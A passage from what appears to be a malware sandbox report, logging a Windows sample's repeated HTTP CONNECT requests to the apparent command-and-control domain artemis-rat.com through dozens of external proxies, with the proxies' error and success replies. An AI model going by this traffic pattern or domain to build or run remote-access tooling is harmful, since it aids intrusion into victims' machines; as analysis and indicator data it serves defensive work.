                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:58.460268021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:10.522567987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:34.522563934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:22.522501945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1150192.168.2.45366183.136.219.140807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.245779991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.866430998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.554178953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.757828951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.163966894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.663383007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.163362980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.069526911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.757055998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1151192.168.2.452997192.163.200.196595597284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.255628109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257194042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.265126944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.366734982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.366317987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1152192.168.2.45367738.162.25.6331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.261801958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.673660994 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1153192.168.2.453681157.185.157.151265897284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.268136978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1154192.168.2.45262658.20.248.13990027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.270005941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.659024000 CET311INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1155192.168.2.453549180.250.159.4941537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.287400961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1156192.168.2.45359235.199.90.22588887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.290141106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.753560066 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1157192.168.2.45361088.79.243.10331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.302439928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.622674942 CET1254INHTTP/1.1 403 Forbidden
                                              Server: squid/3.5.28
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 952
                                              X-Squid-Error: ERR_ACCESS_DENIED 0
                                              Content-Language: en
                                              X-Cache: MISS from ah_test
                                              Via: 1.1 ah_test (squid/3.5.28)
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d 6f 6e 2c 20 31 31 20 4d 61 72 20 32 30 32 34 20 30 37 3a 33 37 3a 32 32 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 07:37:22 GMT</p></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1158192.168.2.453612185.110.190.99807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.306983948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1159192.168.2.453683184.185.2.1241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.315570116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1160192.168.2.45363113.37.59.9931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.324029922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.620706081 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1161192.168.2.453629121.128.194.154807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.324266911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1162192.168.2.45164072.167.220.46288107284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.333662987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.366398096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.366976976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.460278988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.460021019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1163192.168.2.453525103.204.55.22110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.334573030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1164192.168.2.451564211.196.195.4641457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.336930990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.366420984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.366976976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.460293055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1165192.168.2.45372550.63.12.10160957284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.337032080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.799477100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366063118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.435403109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.659986973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.795583963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1166192.168.2.452628206.220.175.241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.349337101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1167192.168.2.45371038.162.28.15031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.353513956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.785588026 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1168192.168.2.453760104.20.89.77807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.353574991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.507941008 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
